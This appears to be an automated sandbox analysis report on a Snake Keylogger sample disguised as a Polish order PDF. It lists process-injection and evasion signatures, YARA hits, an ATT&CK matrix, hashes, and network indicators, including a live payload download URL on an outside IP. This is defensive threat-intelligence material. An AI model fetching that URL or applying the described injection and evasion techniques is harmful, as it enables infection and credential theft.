Source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607184794.000002C688D64000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2547904821.00000264286EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140000000 value starts with: 4D5A

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Thread register set: target process: 5604

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140000000	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140002000	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 140022000	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: FF25174010	Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Queries volume information: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR

Source: Yara match	File source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 2.2.InstallUtil.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a7d8b58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	311 Process Injection	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	Data from Local System	1 Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
zam#U00f3wienie 12832025_pdf .scr.exe	19%	Virustotal	Browse
zam#U00f3wienie 12832025_pdf .scr.exe	11%	ReversingLabs
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://161.248.239.119/ADOLF/Nnjlcgpkdo.pdfW&	0%	Avira URL Cloud	safe
http://161.248.239.119	0%	Avira URL Cloud	safe
http://161.248.239.119/ADOLF/Nnjlcgpkdo.pdf	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
checkip.dyndns.com	158.101.44.242	true	false		high
checkip.dyndns.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
http://161.248.239.119/ADOLF/Nnjlcgpkdo.pdf	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://161.248.239.119/ADOLF/Nnjlcgpkdo.pdfW&	zam#U00f3wienie 12832025_pdf .scr.exe	true	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp	false		high
http://checkip.dyndns.org	InstallUtil.exe, 00000002.00000002.2548659789.000002642A33D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	InstallUtil.exe, 00000002.00000002.2548659789.000002642A33D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A701000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2548659789.000002642A231000.00000004.00000800.00020000.00000000.sdmp	false		high
http://161.248.239.119	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1607652560.000002C68A701000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1617765697.000002C6A30D8000.00000004.00000020.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
161.248.239.119	unknown	unknown		396269	BPL-ASNUS	false
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1658030
Start date and time:	2025-04-07 08:36:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	zam#U00f3wienie 12832025_pdf .scr.exe renamed because original name is a hash value
Original Sample Name:	zamwienie 12832025_pdf .scr.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/0@1/2
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.204.23.20, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target InstallUtil.exe, PID 5604 because it is empty
Execution Graph export aborted for target zam#U00f3wienie 12832025_pdf .scr.exe, PID 2360 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:37:01	API Interceptor	119x Sleep call for process: zam#U00f3wienie 12832025_pdf .scr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
158.101.44.242	dekont_20250403_372827738273882832.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	63040678833_20250128_16135230_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Fiyat teklifi hk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	sipari#U015f formu_#U00a0831542.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Supply Order Confirmation.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	SecuriteInfo.com.Win32.MalwareX-gen.8408.17417.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	SNKO131250300452 SUR BL.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	MM-7925-0224_110_AD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	facturaswift.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	checkip.dyndns.org/
	justificante pago.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	REQ NO. 88484.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	SecuriteInfo.com.Win32.CrypterX-gen.17934.32462.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	Solicitud de Cotizaci#U00f3n de Desechables M#U00e9dicos para Hospital de Bolivia.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	e-dekont.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	dekont_20250403_372827738273882832.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	Dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	QUOTATION_MARQUOTE312025#U00faPDF.scr	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	132.226.8.169
	E-dekont.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Shipping Programm & DOCs MEDUVO716132.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	MAWB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BPL-ASNUS	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	161.240.146.35
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	161.232.155.219
	xd.mpsl.elf	Get hash	malicious	Mirai	Browse	161.233.57.185
	xd.mips.elf	Get hash	malicious	Mirai	Browse	161.229.100.105
	mpsl.elf	Get hash	malicious	Unknown	Browse	161.238.189.116
	ppc.elf	Get hash	malicious	Okiru	Browse	161.240.248.23
	hoho.i486.elf	Get hash	malicious	Unknown	Browse	161.240.222.157
	jkse.ppc.elf	Get hash	malicious	Unknown	Browse	161.244.80.151
	nabarm7.elf	Get hash	malicious	Unknown	Browse	161.244.217.10
	jklarm7.elf	Get hash	malicious	Unknown	Browse	161.248.151.241
ORACLE-BMC-31898US	resgod.sh4.elf	Get hash	malicious	Mirai	Browse	168.138.191.67
	Solicitud de Cotizaci#U00f3n de Desechables M#U00e9dicos para Hospital de Bolivia.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	sora.arm.elf	Get hash	malicious	Mirai	Browse	140.238.50.90
	dekont_20250403_372827738273882832.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	158.101.44.242
	Dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	E-dekont.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	Shipping Programm & DOCs MEDUVO716132.pdf.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.6.168
	MAWB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	63040678833_20250128_16135230_HesapOzeti.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	hesaphareketi-01.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	193.122.130.0

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.5286371015996005
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	zam#U00f3wienie 12832025_pdf .scr.exe
File size:	26'112 bytes
MD5:	83792964e40a22bcfc1e2f1306b0bf45
SHA1:	d63bd6e28a9121437b7058a7431e47f646a2eb24
SHA256:	80b9229be143dc6f0ced2e037e4b3354bd364c90bc39b47ef5e65d6bd196a91a
SHA512:	531f865be6bd4b95ace508c823311b069233d021f0285ce57129986d7944c99aa5d12df71575f65179501ec53fae1b5519b03c9a947685ba3f8b4425c354fe35
SSDEEP:	768:FGs3AsCroTuXk3Uos9Ewn0KSePu8whZx2zC+:FZdTB3BYH0lCu8wcd
TLSH:	45C25C17F6AC4A22D16AC77EC49BD5033328A2869B13C91F759B3F833C02326DA35657
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....8.g.................B..."........... ....@...... ....................................`...@......@............... .....

File Icon


Icon Hash:	133bcbb2b29ba35b

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67F33891 [Mon Apr 7 02:29:37 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8000	0x211c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x41f0	0x4200	61194bfe2760e2193f487910037c48b1	False	0.5567589962121212	data	5.847871120029029	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8000	0x211c	0x2200	4f77cf9a1c8c61b02a76fd47d3f21cd8	False	0.8443244485294118	data	7.419612177115809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x8130	0x1abf	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9596903753468672
RT_GROUP_ICON	0x9bf0	0x14	data	1.05
RT_VERSION	0x9c04	0x32c	data	0.4248768472906404
RT_MANIFEST	0x9f30	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	Pchqowhldi
FileVersion	1.0.0.0
InternalName	Pchqowhldi.exe
LegalCopyright	Copyright 2019
LegalTrademarks
OriginalFilename	Pchqowhldi.exe
ProductName	Pchqowhldi
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Network Behavior

Download Network PCAP: filtered – full

Network Port Distribution

Total Packets: 433
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 7, 2025 08:37:03.275603056 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:03.615072966 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:03.618356943 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:03.625338078 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:03.966331959 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:03.966368914 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:03.966392040 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:03.966439962 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:03.966453075 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:03.966500044 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.306113005 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306140900 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306180000 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306194067 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.306200981 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306237936 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306250095 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.306256056 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306307077 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306320906 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.306339025 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.306420088 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.648698092 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648740053 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648762941 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648787975 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648794889 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.648813009 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648838997 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648838997 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.648865938 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648884058 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.648890972 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648916960 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648940086 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.648940086 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648971081 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.648984909 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.648991108 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.649019003 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.649030924 CEST	49691	80	192.168.2.5	161.248.239.119
Apr 7, 2025 08:37:04.649044037 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.649068117 CEST	80	49691	161.248.239.119	192.168.2.5
Apr 7, 2025 08:37:04.649085999 CEST	49691	80	192.168.2.5	161.248.239.119
